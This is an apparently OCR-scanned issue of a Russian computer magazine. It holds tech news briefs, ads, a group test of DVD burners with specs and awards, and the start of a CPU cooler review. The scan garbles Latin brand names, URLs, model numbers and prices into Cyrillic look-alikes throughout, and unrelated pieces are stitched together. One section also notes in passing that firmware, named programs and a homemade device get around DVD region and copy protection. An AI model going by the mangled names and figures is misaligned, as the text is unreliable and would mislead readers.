суперкорпораций, таких как ІВМ, (Зоодіе и МіогозоН. Ѳ0. Покойся 
с миром АІВО Прискорбная новость поступила от представите- 
лей $опу. Корпорация приняла решение полностью прекратить 
дальнейшую разработку своих легендарных роботов — АІВО и 
0В10. Причиной этому послужило то, что времена сейчас тяже- 
лые и вкладывать средства в неприбыльные отрасли совершенно 
непозволительно. Специалисты, участвовавшие в работе над 
обоими проектами, будут переведены на другие должности и при- 
соединятся к остальным группам, разрабатывающим стандарт- 
ную бытовую электронику. В скором времени производство 
кибернетических собачек полностью прекратится, а техническая 
поддержка будет осуществляться, пока питомцам не исполнится 
по семь лет. Тысячи фанатов АІВО до сих пор не могут оправиться 
от шока, однако сдаваться без боя они не собираются, поэтому 
непрерывно заваливают почтовые ящики корпорации мольбами и 
угрозами, впрочем, $опу остается пока непреклонной. 
ѲО. Равноценный обмен Власти Мексики уже давно сошлись 
во мнении, что стандартные методы борьбы с преступностью не 
приносят должного результата, поэтому для разнообразия реши- 
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Когда-то в древности Великий Учитель решил испытать 
своих учеников, предложив им выбрать для себя мечи. 

Один из них выбрал легкий меч, надеясь сохранить силы 
в долгом походе. Другой выбрал длинный меч, надеясь 
поразить им больше противников с безопасного расстояния. 
Но самым мудрым оказался третий ученик, который 
выбрал для себя самый удобный меч, ставший продолже- 
нием его руки. 

Удобство — вот разумный выбор! 
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ли опробовать и альтернативные способы. Так недавно была организована следующая программа по разоружению насе- 
ления: каждому, кто притащит в специальный приемный пункт любое огнестрельное оружие, будет взамен торжественно 
вручен новенький компьютер. Пока программа действует лишь в Мехико, и на нее выделено всего-то 150 компов, однако, 
если в обменный пункт выстроится очередь, то масштабы проекта, несомненно, расширят. Конечно, немного странно, что 
за разные классы стволов подсовывают одинаковые компы, надо было бы сделать так: принес пистолет — получи систем- 
ный блок офисного уровня, а припер зенитку — распишись в получении навороченного комплекта с монитором, мышкой и 
клавиатурой. К тому же почему-то мне не верится, что если у моджахеда хранился под подушкой автомат, то, обменяв его 
на новенький компьютер, он в корне изменит свою жизнь и займется, например, веб-дизайном. Ведь компьютер в недобрых 
руках — тоже оружие, да еще какое. ѲѲ. Тюльпановый принтер В ассортименте онлайнового магазина Сотрасіітрасі . 
сот появился уникальный принтер, который предназначен для печати изображений на... цветах. А что? Девайс вполне 
полезный. Теперь, к примеру, можно не просто подарить любимой девушке букет ароматных цветов, но и написать несколь- 
ко приятных слов прямо на них. А заодно и на открытке сэкономить :). Подробности внутреннего устройства РІоѵѵег Ргіпіег 
не разглашаются, но, судя по всему, он напоминает обыкновенный струйный принтер, однако перед печатью подопытный 
цветок необходимо обработать специальным маслом. Также доподлинно неизвестно, возможно ли подключить девайс к 
компьютеру и каким образом загружать в него новые изображения. Похоже, что вое это будет сюрпризом для покупателя. 
Кстати, стоит это чудо немало — 1 250 американских президентов, а каждый новый картридж — 65. Конечно, для домашних 
развлечений игрушка дороговата, но вот большинство цветочных салонов смогут себе это позволить, тем более у покупа- 
телей цветов услуга явно будет пользоваться спросом. ѲѲ. Авианосец класса люкс Популярность яблочного плеера 
ІРоб и вправду не знает границ. К примеру, сейчас практически все крупные автомобильные концерны (ВМѴѴ, Ѵоікзѵѵадеп, 
ІМІззап, Мегсесіез-Вепд, АисІІ, Реггагі, Нопба, Ѵоіѵо и т.д.) уже стали добавлять в базовую комплектацию своих новых машин 
док-станцию для сами_знаете_какого плеера. Однако это ничто по сравнению с тем, как выразили свою любовь к ІРоб 
британские военные. Спущенные недавно на воду авианосцы Туре 45 Оезігоуегз призваны не только наводить ужас на 
потенциальных противников, но и нехило развлекать командный состав. В частности, новые авианосцы оборудованы широ- 
кополосным доступом в Интернет, СО-плеерами и многоканальными аудиосистемами с доками для ІРоб! Наверняка это 
далеко не полный перечень увеселительных приспособлений — наличие остальных просто постеснялись огласить. Моряки, 
которым посчастливилось нести службу на данном корабле, пребывают в состоянии полного восторга, граничащего с 
эйфорией, а вот честные налогоплательщики откровенно негодуют, особенно после того, как узнали, что стоимость каждой 
такого посудины находится в районе одного миллиарда долларов, позаимствованных, естественно, из бюджетных средств. 
Ѳ0. Клава в три кнопки Дизайн-студия Артемия Лебедева, ставшая известной по всему миру благодаря уникальной 
клавиатуре Оріітиз, в которой каждая клавиша содержит в себе ОІ_ЕО-экран, недавно анонсировала еще одно устройство 
из той же серии — Оріітиз тіпі ІЬгее. Девайс представляет собой упрощенную до предела клавиатуру — всего из трех 
кнопок, каждая из которых, как и у старшего собрата, является цветным ОІ_ЕО-дисплеем с разрешение 96x96 пикселей. 
Смотрится эта кроха более чем стильно, тем более дисплеи способны отображать до 262,000 цветов и поддерживают ани- 
мацию до пяти кадров в секунду. Количество реальных применений для Оріітиз тіпі ІИгее практически не ограничено. 
Разработчики, например, предлагают использовать ее как индикатор системных ресурсов, пульт управления для ІТипез и 
других плееров, индикатор прихода новых сообщений по почте и ІСО или даже как игровой автомат типа «однорукого бан- 
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дита». В дальнейшем можно будет самостоятельно назначить кнопкам новые функ- 
ции и загрузить новые изображения — для этого в комплекте будет прилагаться 
специальная утилита (Оріітиз Сопіідигаіог). Ожидается, что самые первые партии 
девайсов поступят в продажу уже в середине мая, а в России появятся примерно в 
июне, однако уже сейчас на мини-клавиатуру можно сделать предварительный заказ 
по специальной цене в сто баксов ровно. 00. Деревянный тетрис Вряд ли на 
этой планете удастся найти человека, который ни разу не слышал, что такое «тет- 
рис», если не брать в рассмотрение потомственных африканских каннибалов и 
жителей самого Крайнего Севера. Дизайнеры из мебельной компании Вгаѵе Зрасе 
тоже знают и любят эту игру, а так как они все-таки дизайнеры и подключать по 
поводу и без повода свое креативное мышление им далеко не чуждо, то, просиживая 
за тетрисом очередной рабочий день, им вдруг пришла в голову гениальная идея: 
почему не сделать по принципу тетриса нечто полезное? Так и появилась на свет 
самая крутая в мире книжная полка. Данный предмет интерьера состоит из несколь- 
ких деревянных модулей, сделанных по форме блоков из тетриса. Вся прелесть 
заключается в том, что изначально модули не скреплены между собой, и последова- 
тельность сборки своей собственной полки отдается полностью на усмотрение поку- 
пателя. Как оказалось, тетрисные блоки идеально подходят для хранения практичес- 
ки любимых предметов — в самых низких отделениях можно расположить коробки с 
СО или ОѴО, в тех, что повыше, — книги, ну и так далее. При этом блоки можно пово- 
рачивать, получая то длинные и низкие, то короткие и высокие ниши, а также остав- 
лять между блоками пустоты, создавая новые пространства для размещения вещей. 
В результате книжная полка смотрится просто великолепно, при этом она тебе не 
скоро наскучит, так как всегда ее можно пересобрать в другой последовательности. 
Впрочем, теперь настала пора и для плохой новости. Стоит это деревянное произве- 
дение дизайнерского искусства адски дорого — примерно 350 баксов за каждый 
модуль, то есть для того, чтобы собрать полноценный стеллаж, придется раскоше- 
литься, как минимум, на три килобакса :((. Обидно, но будь у меня лишние деньги — 
купил бы обязательно. 00. Антигигиенично Как часто ты заходишь в интернет- 
кафе? А ты никогда не задумывался о том, что это может быть опасно для здоро- 
вья? Нет, я говорю не о вредоносном излучении ЭЛТ-мониторов... Вот, например, 
ты сидишь, потягиваешь кофе, жуешь пирожок, ничего не подозревая, двигаешь 
мышку... А ведь до тебя эту же самую мышку лапали сотни тысяч человек, и далеко 
не у всех выработана привычка перед этим мыть руки. Как показали исследования, 
в среднем на десяти квадратных сантиметрах поверхности типичной мышки из 
интернет-кафе может содержаться до 1 100 колоний бактерий! То есть выходит так, 
что в общественном туалете уровень состояния гигиены оказывается на порядок 
лучше. Дело в том, что туалеты во всех приличных заведениях принято каждый день 
и мыть, и дезинфицировать, а вот до мышек, конечно, никому никакого дела нет. А 
теперь вспомни, что только что ты той же самой рукой, которой трогал мышку, 
подносил ко рту недоеденный пирожок. Поэтому мой тебе совет: всегда носи с 
собой собственную мышку, а заодно и клавиатуру. ѲѲ. Автограф робота 
Знаменитые писатели на редкость занятые люди, им приходится не только выда- 
вать по несколько бестселлеров в год, но и, чтобы книги хорошо продавались, 
устраивать по случаю каждой из них шумную презентацию, а также длительный тур 
в поддержку по стране или даже по миру. Однако большую часть времени в течение 
мероприятий тура они вынуждены с натянутой улыбкой сидеть перед нескончаемой 
очередью поклонников и раздавать автографы на свежеприобретенных книгах. 
Канадскую писательницу — Магдагеі Аіѵѵооб — данная обязательная процедура 
утомляла настолько, что она решила найти себе помощника, который бы ездил по 
всем турам вместо нее. Впрочем, с двойниками вышел облом, и она не придумала 
ничего лучше, как соорудить для этих целей специального робота. Конечно, полу- 
чившееся устройство сложно назвать полноценным роботом, так как оно состоит 
всего лишь из механизированной руки, которой можно управлять удаленно. 
Презентация книги будет проходить следующим образом: с писательницей, нахо- 
дящейся у себя дома в Канаде, будет организовываться телемост, а автографы 
всем желающим будет раздавать как раз робот, способный в точности повторять 
движения руки писательницы. Первое мероприятие такого формата должно будет 
пройти уже в самое ближайшее время. Впрочем, как бы поклонники не сочли 
подобное за неуважение к себе, а то ведь и обидеться могут. 00. Турбоскейт 
Наверное, за последние годы уже все типы транспортных средств были переведе- 
ны целиком на электронную основу: и машины, и мотоциклы, и велосипеды, и само- 
каты, и ролики, и скейты... Хотя скейтов вроде еще не было, впрочем, малоизвест- 
ная компания Е-ѲІІбе умудрилась и это исправить. За основу ими берутся доски 
известных марок, к которым снизу подсоединяется плоский, но довольно мощный 
электрический мотор. При этом скоростные характеристики у получающейся теле- 
жки оказываются на вполне солидном уровне — разгон до двадцати миль в час за 
четыре секунды, а на одном комплекте батарей можно проехать до пятнадцати 
миль. Для управления используется специальный пульт: проводной или беспровод- 
ной на выбор. Вот только неизвестно, есть ли на скейте датчик веса, а то ведь 
упадешь с него разок, а потом попробуй его догони :). Однако если ты уже готов 
ощутить экстрим на новом уровне, то смело разбивай копилку и перечисляй на счет 
звездно-полосатиков с сайта ѵѵѵ\лл/.е-аІісІе.сот кровные 420 — 550 у.е. (в зависимос- 
ти от крутости оригинальной доски). 
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ВЕЛОСИПЕД 

РАКЕТА 



Кататься на велосипеде — это круто. Ни пробки, ни бабки с колясками — не помеха. Однако человек по 
своей природе чрезвычайно ленивое существо. Крутить педали многим лень, и люди начинают приду- 
мывать различные приспособления, чтобы облегчить себе жизнь. Один такой человек решил приделать 
к велосипеду ракету. Несчастный, что с ним стало. 

Знойный амерТим Пикенс, занимающийся разработкой ракет, сделал велосипед, который приводится 
в движение при помощи ракеты, закрепленной на раме велосипеда. Двигатель обеспечивает тягу в 91 
кг/с и разгоняет велосипед с наездником до 100 км/ч за пять секунд. 

Примечательно, что двигатель байка использует ту же технологию, что и космический аппарат 
ЗрасеЗЬІрОпе. За исключением одной детали: вместо хитрого синтетического топлива велосипедный 
двигатель использует обычный кровельный мазут, которым замазывают дырки в крыше старых зданий. 

Зажигание двигателя работает от электрической батарейки и включается по нажатию специальной 
кнопки. В двигателе мазут испаряется, пары смешиваются с окислителем (используется закись азота 
N20), и байк несет вперед с адской силой. Регулировать тягу можно при помощи специальной ручки, 
положение которой контролирует подачу окислителя. 

Создание такого байка обошлось в $750. 
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Как только увижу твою 

фотку на обложке - позвоню! 



подожди нас с мамой 
т ' после представления. 



Любимых 

номера 




Лицензия Министерства РФ по связи и информатизации №24136. 

Номера региональных лицензий на ѵѵѵѵѵѵ.тіз.ги. Срок действия предложения ограничен. 
Данное предложение не должно рассматриваться как приглашение делать оферты. 

Подробности на сайте ѵѵѵѵѵілтів.ги. 



Абонентская плата - 0$ 
Подробности по телефону 05901 





§ат5ілпд 

ѴѴгіІетазІег ЗНѴѴ162С 

Поддерживаемые форматы РУР: +/-В, +/-ВѴѴ 

Скорость записи РУР: +/-Р (16х), +/-РѴѴ(8х), +/-Р РЦ4х), 
Тестовое время записи РѴР+П 16х: 5,56 



★★★★★★★★★ 

2 





Стильный черный привод от Затзипд попал к 
нам в руки. Подключение не отняло много вре- 
мени, а система автоматически определила 
модель и установила необходимые драйвера. 
Несмотря на невысокую цену, девайс достойно 
показал себя при записи тестового диска, на 
который ушло менее шести минут — отличное 
время. На графике мы видим зубчатую диаг- 
рамму, которая демонстрирует скачки скорос- 
ти при записи. Приблизившись к краю болван- 



ки, привод резко сбросил скорость, что может 
обернуться ошибками при чтении или задерж- 
кой при копировании. Скоростной тест пока- 
зал, что этот же диск Затзипд ѴѴгіІетазІег ЗН- 
ѴѴ162С прочел за шесть с половиной минут. 
Максимальная скорость чтения достигла от- 
метки 12.37х, но даже при такой скорости при- 
вод шумел не сильно и не пугал вибрациями. 
Отсутствие поддержки формата ОѴО-ВАМ 
компенсируется выгодной ценой. 



НР 0Ѵ0849І 

Поддерживаемые форматы РУР: +/-В, +/-ВѴѴ, -ВАМ 
Скорость записи РУР: +/-В (16х), +/-ВѴѴ(8х/6х), 

+/-Н РЦ8х/4х), -ВАМ(5х) 

Тестовое время записи РѴР+П 16х: 5.40 



★★★★★★★★★ 

і 





Новая модель ОѴО-резака от Неѵѵіей Раскагб. Как 
его окрестили в компании — Зирег Миііі 0\Ш 
ѴѴгіІег. И в самом деле, привод позволяет рабо- 
тать со всеми форматами ЭѴО. Самым приятным 
было то, что привод стал абсолютным рекордсме- 
ном при тестовой записи 0\Ю+Н. Скоростные по- 
казатели во всех режимах вселяют уверенность в 
том, что НР 0Ѵ0849І еще достаточно долго будет 
актуальным. В качестве технологии, напрямую не 
связанной с записью ОѴЭ, нужно рассмотреть 



ІідМЗсгіЬе. Суть этой фишки заключается в том, 
что на диске, имеющем дополнительный слой, 
можно прожигать любое изображение. То есть на 
лицевой стороне (той, на которую ты смотришь, 
вставляя диск в привод) можно выводить монох- 
ромное изображение. Прелесть в том, что нет не- 
обходимости в принтере, а соответственно, не 
нужна краска. Только вот изображение монохром- 
ное, а специальные болванки, поддерживающие 
нанесение изображения, стоят дорого. 







Затзипд ѴѴгіІетазІег ЗН-ѴѴ162С 
РДЕХТОВ РХ-755А 
І\ІЕС N0-3551 А 




РІОЫЕЕВ 0ѴП-11СЮ 
ТЕАС ОѴ-ѴѴ58Е 
НР 0Ѵ0849І 
АЗІІЗ ОРѴѴ-1608Р23 
ТЕАС ОѴ-ѴѴ516ѲС 



ЫЕС N0-4551 А 





Методика Для проведения теста была задействована программа С0-0\Ю 
тестирования Зрееб из пакета Абеаб Ыего. Для проверки скоростных показателей 
чтения и записи были выбраны 16х болванки ОѴО+И. Ты и сам смо- 
жешь провести такой тест со своим приводом. Для начала записы- 
вался диск с данными, и при этом выявлялась средняя и максималь- 
ная скорость записи. На графиках зеленым цветом отображена ско- 
рость записи, а желтым — скорость вращения шпинделя привода. Ра- 



ботая в разных режимах записи, привод может как наращивать ско- 
рость записи путем увеличения количества оборотов, так и стабили- 
зировать скорость вращения. Обычно скорость чтения будет увели- 
чиваться при приближении к внешнему краю диска, так как головка 
за то же время пробегает большее расстояние. Для снятия скорост- 
ных показателей чтения использовалась та же утилита. Она отлично 
демонстрирует, чего стоит ждать от привода в процессе копирования. 
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ЗАЖГИ ПО-БЫСТРОМУ 



Алексей Шуваев, 1ез1_ІаЬ (ІезІ_ІаЬ@датеІапсІ.ги) 



Іпіго 



Совсем недавно фраза «скинь мне пару фильмов», сказанная по телефону, обозначала возню с несколькими дис- 
ками. С появлением ВѴВ-рекордеров изменился не только объем данных, которые легко можно сохранить на одном 
диске, но и время, затрачиваемое на прожиг болванки. Как потратить свои у.е. ты решишь сам, а мы тебе поможем 
определиться с выбором ВѴВ-резака. 



У истоков 



Стремление сохранить больше и при 
этом потратить меньше всегда прес- 
ледовало ИТ-направленную часть 
общества. Наиболее успешными и 
удобными носителями в свое время 
были дискеты формата 3.5". Но необ- 
ходимость хранить и передавать все 
возрастающие объемы информации 
толкала корпорации вперед, и поя- 
вился первый оптический диск. Впос- 
ледствии его удачно перепрофили- 



ровали под хранение любых данных. 
Большой объем и надежность были 
не только плюсами, но и минусами 
данного вместилища данных. Техно- 
логический предел в 800 мегабайт 
уже не устраивал привередливых 
пользователей и был создан концерн 
по разработке более продвинутого 
накопителя. Решено было пойти по 
пути усовершенствования уже имею- 
щегося СВ. Как и в случае с компакт- 



дисками, разработка ВѴВ изна- 
чально велась в интересах киноин- 
дустрии, ведь больший объем поз- 
волял меньше сжимать изображе- 
ние и звук, тем самым удовлетворяя 
бесконечно большие потребности 
пользователей. Впоследствии, как 
это было и с СВ, ВѴВ очень удачно 
пришелся в компьютерном мире как 
отличный, емкий накопитель. Так 
ВѴВ начал входить в массы. 



Что есть ЭѴР? 



Если посмотреть на отражающую или рабочую сторону 
болванки ВѴВ, то его легко спутать с СВ. Технология из- 
готовления довольна схожа. Имеется отражающий слой, 
меняющий свои физические свойства под воздействием 
лазера. Но это только кажется. На самом деле ВѴВ вдвое 
тоньше своего предшественника, и поэтому стало воз- 
можным создавать двухсторонние диски, то есть просто 
склеивать два ОѴО в один. Благодаря применению новых 
отражающих слоев нашли способ увеличить емкость но- 
сителя за счет создания дополнительного слоя с ограни- 
ченной прозрачностью. То есть как будто сделали буте- 
рброд, где первым идет полупрозрачный слой, а второй 
— непрозрачный. Лазер, закончив считывать первый 



слой, меняет фокусировку и считывает данные со второ- 
го. Таким образом, мы получаем четыре типа дисков: 

1 ВѴВ-5 — однослойный односторонний (4.7 Гб) 

2 ВѴБ-9 — двухслойный односторонний (8.5 Гб) 

3 БѴВ-10 — однослойный двухсторонний (9.5 Гб) 

4 ВѴВ-18 — двухслойный двухсторонний (17 Гб) 

Но основным и главным отличием является плотность 
записи, которая возрасла в несколько раз. Применив ла- 
зер с меньшей длиной волны, удалось сократить рассто- 
яние между дорожками спирали и между самими ріі’ами 
(канавками). Из рассмотренных дисков наибольшее 
распространение получили первые три типа, и встретить 
их на прилавках не представляет особых трудностей. 



Методы защиты 



Так как в разработке формата ВѴВ принимали участие ки- 
нокомпании, они были заинтересованы в эффективной за- 
щите своей продукции. Наверняка ты сталкивался с таким 
явлением, как выход кинокартин в разное время в разных 
странах. Для того чтобы избежать пиратских копий, распро- 
страняющихся по миру, было решено поделить планету на 
зоны. Кодирование каждого диска производится в соответ- 
ствии с зоной, куда завозится диск, а бытовые ВѴВ-плееры 
имеют ключ, декодирующий изображение. Таким образом, 
находясь в России и купив официально изготовленный пле- 
ер, ты не сможешь посмотреть диск, привезенный из США. 
Итого, мы имеем 8 зон: 

1 Канада и США; 

2 Япония, Европа, Южная Африка, Ближний Восток; 

3 Юго-восток Азии, Восточная Азия; 

4 Австралия, Новая Зеландия, Тихоокеанские острова, 
Карибские острова, Южная и Центральная Америка; 

5 Территория бывшего СССР, Индийский полуостров, 
основная часть Африки; 

6 Китай; 

7 Зарезервированная зона; 

8 Экстерриториальная зона: 
самолеты, лайнеры, пароходы...; 

Существуют мультизонные приводы, позволяющие чи- 
тать диски из любой области. Довольно скоро такую 
практику решили прекратить, но благодаря любителям, 



радеющим за доступность информации, появились спе- 
циальные программы и прошивки приводов. ВѴВ-реза- 
ки, предназначенные для компьютеров, как правило, 
позволяют сменить зону до 5 раз и потом блокируются 
на последней. Однако были разработаны прошивки для 
обеспечения мультизонности. На сайте ѵѵѵѵѵѵ.грсі .ого 
иногда можно найти прошивку и для своего девайса. 
Другие методы защиты не менее эффективны, но они 
действуют несколько иначе. Первый — Сопіепі 
ЗсгатЫіпд Зузіет — шифрует содержание БѴБ таким 
образом, чтобы его копию на жестком диске нельзя было 
просмотреть. Но и тут хакеры находят средства для пре- 
одоления защиты. Например, при помощи программы 
ВѴВ Педіоп+СЗЗ Ргее. 

Вторая технология предназначена для борьбы со старыми и 
прожженными пиратами. Работает она таким образом: при 
передаче аналогового изображения на телевизоре все очень 
хорошо видно благодаря его инерционности. А вот при запи- 
си такого сигнала на видеомагнитофон возникает неприят- 
ная вертикальная полосатость, потеря цветности, срыв синх- 
ронизации кадров. Называется эта система Апаіодие 
Ргоіесііоп Зузіет или АРЗ. Хакеры обходят эту защиту при 
помощи самодельного девайса на базе микроконтроллера 
№://тасгоѵізіоп0.ігіРосІ.соіті/ . либо при помощи готового де- 
вайса, купленного через Интернет за -80 баксов. 
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ТезІЧаЬ выражает благодарность за предоставленное на тестирование оборудование компаниям: ААИОН (т.(495)727-1818, мллм.аііоп.щ) . 
Графитек (\м\ллл/.агаіі1ес,ги) . а таюке российским представительствам компаний Рохсопп, М5І, СИаіпІесН, Согзаіг, пѴібіа и АН. 
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Выводы В существующей реальности наиболее 
ценно время. И ты, как человек дело- 
вой, знаешь, чего оно стоит. Поэтому 
тратить деньги за возможность поси- 
деть спокойно перед компьютером, 
ожидая окончания записи, будет не рас- 
судительно. За выгодную цену и высо- 
кую скорость мы награждаем Затзипд 
ѴѴгіІетазІег ЗН-ѴѴ162С титулом «Луч- 
шая покупка». Приз «Выбор редакции» 
получает НР 0Ѵ0849І за технологич- 
ность и лояльность к пользователю. 



Время записи диска ОѴО+Н 16х 



Затзипд ѴѴгіІетазІег 5Н-ѴѴ162С 

РІ_ЕХТОВ РХ-755А 

ЫЕС N0-355 ІА 

РІОЫЕЕР 0ѴВ-11СЮ 

ТЕАС ОѴ-ѴѴ58Е 

НР 0Ѵ0849І 

АЗІІ5 ОВѴѴ-1608Р25 

ТЕАС ОѴ-ѴѴ516СС 

ЫЕС N0-455 ІА 




14.57 



16 
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МЕС N0-4551 А 

Поддерживаемые форматы РУР: +/-В, +/-ВѴѴ, -ВАМ 
Скорость записи РУР: +/-В (16х), +/-ВѴѴ(8х/6х), 

+/-В РЦ8х/6х), -ПАМ(5х) 

Тестовое время записи РѴР+П 16х: 6.36 

$65 

★★★★★★★★ 



9 

РЬЕХТОВ РХ-755А 

Поддерживаемые форматы РУР: +/-В, +/-ВѴѴ 
Скорость записи РѴР: +/-П (16х), +/-ВѴѴ(8х/6х), +/-П 

РЦЮх/бх) 

Тестовое время записи РѴР+П 16х: 8.35 

$120 

★★★★★★★★ 



8 

МЕС N0-3551 А 

Поддерживаемые форматы РУР: +/-В, +/-ВѴѴ 

Скорость записи РУР: +/-В (16х), +/-ВѴѴ(8х/6х), +/-В РЦ8х/6х), 
Тестовое время записи РѴР+В 16х: 6.31 

$55 

★★★★★★★ 



РІСЖЕЕК ОѴВ-1КЮ 

Поддерживаемые форматы РУР: +/-В, +/-ВѴѴ, -ВАМ 

Скорость записи РУР: +/-В (16х), +/-ВѴѴ(8х/6х), 

+/-В РЦ8х/6х), -ВАМ (5х) 

Тестовое время записи РѴР+В 16х: 6.15 

$70 

★★★★★★★★★ 



6 

ТЕАС ОѴ-ѴѴ58Е 

Поддерживаемые форматы РУР: +/-Н, +/-ВѴѴ 
Скорость записи РУР: +В (8х), +ВѴѴ (4х) 
Тестовое время записи РѴР+В 16х: 14.57 

$40 

★ ★★★★ 



5 

ТЕАС ОѴ-ѴѴ516СС 

Поддерживаемые форматы РУР: +/-П, +/-ВѴѴ 

Скорость записи РУР: +/-В (16х), +/-ВѴѴ(4х), +/-В РЦ2.4х), 
Тестовое время записи РѴР+В 16х: 6.02 

$50 

★★★★★★★ 



А51І8 йВѴѴ-1 608Р28 

Поддерживаемые форматы РУР: +/-В, +/-ВѴѴ, -ВАМ 

Скорость записи РУР: +/-В (16х), +/-ВѴѴ(8х/6х), 

+/-В РЦ8х), -ВАМ(5х) 

Тестовое время записи РѴР+В 16х: 6.16 

$60 

★★★★★★★ 



3 



Старший брат, рассмотренного нами ранее приво- 
да. Отличия между приводами заключаются лишь 
в поддержке ИЕС N0-4551 А дисков формата 
ОѴО-РАМ. Довольно тихие на средних оборотах, 
приводы МЕС несколько вибрируют в начале чте- 
ния и монотонно гудят при максимальной скорос- 
ти вращения. Несмотря на улучшения, коснувши- 
еся N0-4551 А, в средней скорости записи он нес- 
колько проиграл, но на графиках отчетливо вид- 
но, что запись ведется одинаково, а значит, при- 



Достаточно известная компания пополнила ли- 
нейку пишущих приводов моделью РБЕХТОВ 
РХ-755А. Посмотрим, что нам могут предло- 
жить в обмен на достаточно крупную сумму 
в 120 вечнозеленых. Поддержка четырех фор- 
матов из пяти — учитывая стоимость и имя 
компании, можно было ожидать присутствие 
БУБ-ПАМ в техническом описании к устрой- 
ству. Множество новых технологий, внедрен- 
ных в разработку, повысили цену, что отрази- 



Стильный черный привод от Затзипд попал к 
нам. В нашем тесте присутствуют два привода 
марки ИЕС. Младшая модель обладает урезан- 
ными возможностями, но стоит подумать, нужно 
ли отдавать 10 убитых енотов за возможность 
работать с ОѴО-НАМ. Практически одинаковая 
картина наблюдается при записи скоростных 
дисков. Приводу не удается достигнуть заявлен- 
ной скорости 16х при записи, а «гребенка» при 
записи может негативно сказаться в будущем. 



Вслед за моделью 0ѴР-Ю90 компания Ріопеег 
выпускает привод ОѴН-11СЮ. Увеличение ско- 
рости записи двухслойных дисков порадует 
владельцев толстых кошельков — теперь поч- 
ти 10 Гб можно записать, потратив всего 10 
минут. Порадовали наработки в области шу- 
моподавления — привод даже на максималь- 
ных оборотах при копировании диска доволь- 
но тихо шуршал. Нагрев во время работы не- 
велик, и можно не задумываться о темпера- 



На тест к нам попал комбо-привод, который в 
списке своих достоинств содержит не только 
возможность записи БѴО, но и предельно выгод- 
ную цену. «Хорошая цена — не все», — решили 
мы и запустили тест скорости записи. На удивле- 
ние привод не набрал запланированной скорости 
прожига 8х, а застыл на 4х и, не спеша, дожег 
болванку до конца почти за 15 минут. Несколько 
обидно, что привод изначально предназначен 
для чтения всех ОѴО-дисков всех форматов, за 



Мультиформатный привод представила нам ком- 
пания, славящаяся своими СЭ-РІѴѴ приводами, по- 
радовала нас новинкой в области записи ОѴБ. До- 
вольно демократичная цена в полсотни америка- 
нской валюты позволит обзавестись качествен- 
ным приводом с хорошими скоростными показате- 
лями. На графике записи отлично наблюдается 
скачок скорости, но в целом можно считать запись 
отличной. График чтения этого же диска очень 
удивил, так как стабильность чтения на внешних 



Мультиформатный привод представила нам 
АЗЕІЗ. Помимо поддержки всех имеющихся ти- 
пов дисков, привод обладает отличными тех- 
ническими и скоростными характеристиками. 
Возможность полноценной работы с любыми 
болванками, будь то записанный на бытовом 
приводе 0ѴБ-РАМ или взятая у приятеля ЭѴО- 
РѴѴ, обязательно пригодится. Применение тех- 
нологии определения оптимальной скорости 
во время записи каждого конкретного носите- 



воды идентичны. К сожалению, резаку не удалось 
достигнуть максимально возможной скорости за- 
писи, и она ощутимо упала после прохождения се- 
редины диска. Качество чтения может порадо- 
вать. Даже поцарапанные диски читаются хоро- 
шо, но не стоит злоупотреблять. Поддержка тех- 
нологии І_аЬеІИаз(і позволит подписывать диски, 
не открывая лоток. Полезная функция, тем более 
что возможно скорое снижение цен на диски, поз- 
воляющие «рисовать» на них лазером. 



лось и на качестве записи. Чего только стоит 
технология усиления прожига во время записи 
или диагностика пустого носителя! Поняв, что 
пользователи ценят тишину, разработчики 
внедрили технологию подавления шума. На 
графике записи мы можем наблюдать резкий 
сброс и последующую стабилизацию скорости. 
Путем снижения скорости вращения достигает- 
ся улучшение качества записи. Поддержка 
ІідЫЗсгіЬе в таком приводе подразумевается. 



Ближе к концу диска наблюдается сильное паде- 
ние скорости записи, что не добавляет очков де- 
вайсу. Чтение диска ИЕС N0-3551 А далось легко 
и максимальная скорость 16х была достигнута, 
а данные успешно прочитаны за довольно корот- 
кий срок — 5 минут 1 секунда. Приятно порадо- 
вало введение поддержки технологии І_аЬеІ1ІазІі. 
Она является аналогом ІідІгіЗсгіЬе и позволяет 
«выжигать» рисунок, но не забудь, что для этого 
необходимы специальные диски. 



турном режиме окружающих девайсов. Высокая 
скорость чтения, записи и поддержка всех форматов 
БѴО делают РIОNЕЕРІ ЭѴП-1 1 СЮ способным потягаться 
с конкурентами за первенство. Несколько огорчают пос- 
тоянные колебания скорости при записи — так работа- 
ет система коррекции ошибок. Во время чтения девайс 
«захлебнулся» на последней сотне мегабайт, но с успе- 
хом смог завершить копирование. 



исключением ОѴО-РАМ, но способен записывать 
только ОѴО+Н/РѴѴ. При чтении комбо-драйв по- 
казал себя с лучшей стороны и без проблем до- 
вел скорость чтения до отметки 12.37Х. Хорошая 
дуга, демонстрируемая графиком чтения, прак- 
тически без зубьев, что позволяет судить о ста- 
бильном чтении даже поцарапанных дисков. 
Несколько сомнительно выглядит покупка ком- 
бо-привода, когда мультиформатные ОѴБ стано- 
вятся все более доступными. 



витках болванки ставится под большое сомнение. 
Для любителей тишины будет интересным, что 
вибрация и шум при активной работе с диском не 
выше среднего уровня, то есть при воспроизведе- 
нии музыки ТЕАС 0Ѵ-ѴѴ5160С не заглушит звук 
своим урчанием. Приемлемая цена и высокая ско- 
рость записи могут заинтересовать поклонников 
качественной и рабочей техники. Огорчает только 
низкая скорость работы с перезаписываемыми 
дисками и двухслойными болванками. 



ля точно понадобится из-за наличия на при- 
лавках не самых высококачественных болва- 
нок. Чтение ранее записанного диска прошло 
без эксцессов, но максимальной скорости дос- 
тигнуть не удалось, хотя все диски, задейство- 
ванные в тесте, были одинаковы. Применение 
всех фирменных технологий позволяет быть 
уверенным в качестве записи, и, даже не дос- 
тигнув максимальной скорости, привод спра- 
вился с задачей на отлично. 
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Гохсопп СМА-К8-1Т 

Соккѳт: 754, 939, 940 

Подшипники : 1 скольжения, 1 качения 

Скорость вращения: 2000 об/мин 

Поток: 23.81 СРМ 

Шум: 21 дБ 

Размер вентилятора: 80 х 80 х 25 мм 

Тестовый стенд 

Процессор: АМР АІЫоп 64 3000+ @ 2500 МГ ц 

Мат, плата: АЗІІ8 А8М32-8Ц Реіихе 

Память: 2 х 1024МВ РРВ500 Согзаіг ХМ5 РВО (3-4-3-7-1Т) 

Жесткий диск: 120ОВ ѴѴР Саѵіаг ЦВ 

Блок питания: Іпѵѵіп 430ѴѴ 



Результаты тестов 

В простое: 44 °С 

Прогрев: 51 °С 

$7,5 

Известная своими материнскими платами, компания Рохсопп представляет 
еще одну новинку. Девайс по исключительно доступной цене, классической 
конструкции и типичного для кулеров Рохсопп дизайна. Радиатор прямоу- 
